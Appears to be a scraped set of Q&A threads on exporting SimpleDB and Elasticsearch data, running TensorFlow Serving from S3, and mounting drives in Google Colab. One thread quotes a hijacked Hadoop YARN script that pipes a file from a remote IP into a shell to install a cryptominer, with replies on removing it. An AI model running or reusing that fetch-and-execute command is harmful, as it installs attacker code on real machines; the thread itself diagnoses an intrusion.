How can I export data from SimpleDB to Excel or TextPad? - sql

I want to export data from SimpleDB to Excel or TextPad. How can I write a query for exporting data?
Thanks,
Senthil

You can use SDB Explorer to export the data into a CSV file, which you can open with your favorite editor.

Sdbport is a Ruby Gem that can export / import SimpleDB domains. It works across accounts and regions. It can be used as a class or stand alone CLI.
On a system with Ruby intalled (tested with 1.9.3p125):
Install sdbport:
gem install sdbport
Set your AWS credentials:
export AWS_ACCESS_KEY_ID=your_aws_key
export AWS_SECRET_ACCESS_KEY=your_aws_secret
Export SimpleDB domain from us-west-1:
sdbport export -a $AWS_ACCESS_KEY_ID -s $AWS_SECRET_ACCESS_KEY -r us-west-1 -n data -o /tmp/test-domain-dump
Import into domain in us-east-1
sdbport import -a $AWS_ACCESS_KEY_ID -s $AWS_SECRET_ACCESS_KEY -r us-west-1 -n data -i /tmp/test-domain-dump

You can Export your content of domain in XML using SDB Explorer.
For more details please refer our documentation page and for watch video.
Disclosure: I'm a developer of SDB Explorer.

Related

How to Export Data from AWS Elasticsearch Domain into a CSV File

I would like to know how to export indices from AWS Elasticsearch Domain into CSV files.
I appreciate any advise.
Please have a look at https://github.com/taraslayshchuk/es2csv.
You could do something like
es2csv -u https://your-aws-domain.region.es.amazonaws.com -i your_index_name -o csv_file.csv -r -q '{"query" : {"match_all" : {}}}'
Hope that helps.

TensorFlow serving S3 and Docker

I’m trying to find a way to use Tensorflow serving with the ability to add new models and new versions of models. Can I point tensorflow serving to an S3 bucket?
Also I need it to run as a container? Is this possible or do I need to implement another program to pull down the model and add it to a shared volume and ask tensorflow to update models in the file system?
Or do I need to build my own docker image to be able to pull the content from s3?
I found that I could use the TF S3 connection information (even though it isn't outlined in the TF Serving Docker Container). Example docker run command:
docker run -p 8501:8501 -e AWS_ACCESS_KEY_ID=$AWS_ACCESS_KEY_ID -e AWS_SECRET_ACCESS_KEY=$AWS_SECRET_ACCESS_KEY -e MODEL_BASE_PATH=s3://path/bucket/models -e MODEL_NAME=model_name -e S3_ENDPOINT=s3.us-west-1.amazonaws.com -e AWS_REGION=us-west-1 -e TF_CPP_MIN_LOG_LEVEL=3 -t tensorflow/serving
Note Log level was set because of this bug
I've submitted a very detailed answer (but using DigitalOcean Spaces instead of S3), here:
How to deploy TensorFlow Serving using Docker and DigitalOcean Spaces
Since the implementation piggy-backs off an S3-like interface, I thought I'd add the link here in case someone needs a more comprehensive example.

Mount multiple drives in google colab

I use this function to mount my google drive
from google.colab import drive
drive.mount('/content/drive', force_remount=True)
and then copy files from it like this
!tar -C "/home/" -xvf '/content/drive/My Drive/files.tar'
I want to copy files from 2 drives, but when i try to run first script it just remount my 1st drive
How can i mount 1st drive, copy files, then mount another drive and copy files from 2nd drive?
Just in case anyone really needs to mount more than one drive, here's a workaround for mounting 2 drives.
First, mount the first drive using
from google.colab import drive
drive.mount('/drive1')
Then, use the following script to mount the second drive.
!apt-get install -y -qq software-properties-common python-software-properties module-init-tools
!add-apt-repository -y ppa:alessandro-strada/ppa 2>&1 > /dev/null
!apt-get update -qq 2>&1 > /dev/null
!apt-get -y install -qq google-drive-ocamlfuse fuse
from google.colab import auth
auth.authenticate_user()
from oauth2client.client import GoogleCredentials
creds = GoogleCredentials.get_application_default()
import getpass
!google-drive-ocamlfuse -headless -id={creds.client_id} -secret={creds.client_secret} < /dev/null 2>&1 | grep URL
vcode = getpass.getpass()
!echo {vcode} | google-drive-ocamlfuse -headless -id={creds.client_id} -secret={creds.client_secret}
!mkdir -p /drive2
!google-drive-ocamlfuse /drive2
Now, you will be able to access files from the first drive from /drive1/My Drive/ and those of the second drive from /drive2/ (the second method doesn't create the My Drive folder automatically).
Cheers!
Fun Fact: The second method was actually a commonly used method to mount Google drive in Colab environment before Google came out with google.colab.drive
The colab drive module doesn't really support what you describe.
It might be simplest to share the files/folders you want to read from the second account's Drive to the first account's Drive (e.g. drive.google.com) and then read everything from the same mount.
If you're getting an exception with Suyog Jadhav's method:
MessageError: Error: credential propagation was unsuccessful
Follow the steps 1 to 3 described by Alireza Mazochi
https://stackoverflow.com/a/69881106/10214361
Follow these steps:
1- Run the below code:
!sudo add-apt-repository -y ppa:alessandro-strada/ppa 2>&1 > /dev/null
!sudo apt-get update -qq 2>&1 > /dev/null
!sudo apt -y install -qq google-drive-ocamlfuse 2>&1 > /dev/null
!google-drive-ocamlfuse
2- Give permissions to GFUSE
From the previous step, you get an error like this. Click on the link that locates in the previous error message and authenticate your account.
Failure("Error opening URL:https://accounts.google.com/o/oauth2/auth?client_id=... ")
3- Run the below code:
!sudo apt-get install -qq w3m # to act as web browser
!xdg-settings set default-web-browser w3m.desktop # to set default browser
%cd /content
!mkdir drive
%cd drive
!mkdir MyDrive
%cd ..
%cd ..
!google-drive-ocamlfuse /content/drive/MyDrive
After this step, you will have a folder with your second drive.
There is Rclone which is a command-line program to manage files on cloud storage. It is a feature-rich alternative to cloud vendors' web storage interfaces. Over 40 cloud storage products support rclone including S3 object stores, business & consumer file storage services, as well as standard transfer protocols.
In this url you will find how to set it up in Colab. you can even link one drive and other cloud storage products too.
https://towardsdatascience.com/why-you-should-try-rclone-with-google-drive-and-colab-753f3ec04ba1

It's seem that the yarn is infected by Trojan, even if I reinstall my computer?

Every time when I start my yarn, I will find a task request which can't be finished, but I can't get any log about it and I didn't find any error.
And I found a file in temp directory named launch_container.sh, as below:
enter code here#!/bin/bash
export NM_HTTP_PORT="8042"
export LOCAL_DIRS="/home/ubuntu/hadoop/tmp/nm-local-dir/usercache/dr.who/appcache/application_1527211944644_0001"
export HADOOP_COMMON_HOME="/root/hadoop-2.8.3"
export JAVA_HOME="/usr/lib/jvm/java-1.7.0-openjdk-1.7.0.181-2.6.14.8.el7_5.x86_64/jre"
export NM_AUX_SERVICE_mapreduce_shuffle="AAA0+gAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=
"
export HADOOP_YARN_HOME="/root/hadoop-2.8.3"
export HADOOP_TOKEN_FILE_LOCATION="/home/ubuntu/hadoop/tmp/nm-local-dir/usercache/dr.who/appcache/application_1527211944644_0001/container_1527211944644_0001_02_000001/container_tokens"
export NM_HOST="VM_0_11_centos"
export APPLICATION_WEB_PROXY_BASE="/proxy/application_1527211944644_0001"
export JVM_PID="$$"
export USER="dr.who"
export HADOOP_HDFS_HOME="/root/hadoop-2.8.3"
export PWD="/home/ubuntu/hadoop/tmp/nm-local-dir/usercache/dr.who/appcache/application_1527211944644_0001/container_1527211944644_0001_02_000001"
export CONTAINER_ID="container_1527211944644_0001_02_000001"
export HOME="/home/"
export NM_PORT="44381"
export LOGNAME="dr.who"
export APP_SUBMIT_TIME_ENV="1527212057989"
export MAX_APP_ATTEMPTS="2"
export HADOOP_CONF_DIR="/root/hadoop-2.8.3/etc/hadoop"
export MALLOC_ARENA_MAX="4"
export LOG_DIRS="/root/hadoop-2.8.3/logs/userlogs/application_1527211944644_0001/container_1527211944644_0001_02_000001"
exec /bin/bash -c "curl 185.222.210.59/x_wcr.sh | sh"
hadoop_shell_errorcode=$?
if [ $hadoop_shell_errorcode -ne 0 ]
then
exit $hadoop_shell_errorcode
fi
I found it'll download something from a website, and I have reinstalled my computer from ubuntu to centos, and this problem still existed though I can't find same problem in other computers. This problem is whether a normal thing or a trojan?
Please give some hints about how to fixed this problem, thanks.
It's as same as this site "http://ist-deacuna-s1.syr.edu:8088/cluster/apps"
This situation is generatered after I close the port of wget, and when I open port of wget, it will add session which can't be seen by jps, just be observered by commmand
ps -ef|grep java
ubuntu 7484 1 97 07:16 ? 00:01:58 /var/tmp/java -c /var/tmp/w.conf
ubuntu 7496 1 96 07:16 ? 00:01:57 /var/tmp/java -c /var/tmp/w.conf
These two session always hold all my cpu.
this is a hack... They put a miner on your machine. I had the same thing and here is how to get rid of it. They created a cron job to execute a remote sh file to "install" it if you remove it. That must be deleted first. I found mine in
/var/spool/cron
Then you can delete the entire /var/tmp/ directory. Then kill the offending pids. Find them with
ps -Af | grep /tmp/
I am trying to figure out how they were able to access our machine to install this.
Can you check the file /var/tmp/java with --version. Had the same problem. Suggestion you will find XMRig

import local file to google colab

I don't understand how colab works with directories, I created a notebook, and colab put it in /Google Drive/Colab Notebooks.
Now I need to import a file (data.py) where I have a bunch of functions I need. Intuition tells me to put the file in that same directory and import it with:
import data
but apparently that's not the way...
I also tried adding the directory to the set of paths but I am specifying the directory incorrectly..
Can anyone help with this?
Thanks in advance!
Colab notebooks are stored on Google Drive. But it is run on another virtual machine. So, you need to copy your data.py there too. Do this to upload data.py through Colab.
from google.colab import files
files.upload()
# choose the file on your computer to upload it then
import data
Now google is officially providing support for accessing and working with Gdrive at ease.
You can use the below code to mount your drive to Colab:
from google.colab import drive
drive.mount('/gdrive')
%cd /gdrive/My\ Drive/{location you want to move}
To easily upload a local file you can use the new Google Colab feature:
click on right arrow on the left of your screen (below the Google
Colab logo)
select Files tab
click Upload button
It will open a popup to choose file to upload from your local filesystem.
To upload Local files from system to collab storage/directory.
from google.colab import files
def getLocalFiles():
_files = files.upload()
if len(_files) >0:
for k,v in _files.items():
open(k,'wb').write(v)
getLocalFiles()
So, here is how I finally solved this. I have to point out however, that in my case I had to work with several files and proprietary modules that were changing all the time.
The best solution I found to do this was to use a FUSE wrapper to "link" colab to my google account. I used this particular tool:
https://github.com/astrada/google-drive-ocamlfuse
There is an example of how to set up your environment there, but here is how I did it:
# Install a Drive FUSE wrapper.
!apt-get install -y -qq software-properties-common python-software-properties module-init-tools
!add-apt-repository -y ppa:alessandro-strada/ppa 2>&1 > /dev/null
!apt-get update -qq 2>&1 > /dev/null
!apt-get -y install -qq google-drive-ocamlfuse fuse
# Generate auth tokens for Colab
from google.colab import auth
auth.authenticate_user()
# Generate creds for the Drive FUSE library.
from oauth2client.client import GoogleCredentials
creds = GoogleCredentials.get_application_default()
import getpass
!google-drive-ocamlfuse -headless -id={creds.client_id} -secret={creds.client_secret} < /dev/null 2>&1 | grep URL
vcode = getpass.getpass()
!echo {vcode} | google-drive-ocamlfuse -headless -id={creds.client_id} -secret={creds.client_secret}
At this point you'll have installed the wrapper and the code above will generate a couple of links for you to authorize access to your google drive account.
The you have to create a folder in the colab file system (remember this is not persistent, as far as I know...) and mount your drive there:
# Create a directory and mount Google Drive using that directory.
!mkdir -p drive
!google-drive-ocamlfuse drive
print ('Files in Drive:')
!ls drive/
the !ls command will print the directory contents so you can check it works, and that's it. You now have all the files you need and you can make changes to them with no further complications. Remember that you may need to restar the kernel to update the imports and variables.
Hope this works for someone!
you can write following commands in colab to mount the drive
from google.colab import drive
drive.mount('/content/gdrive')
and you can download from some external url into the drive through simple linux command wget like this
!wget 'https://dataverse.harvard.edu/dataset'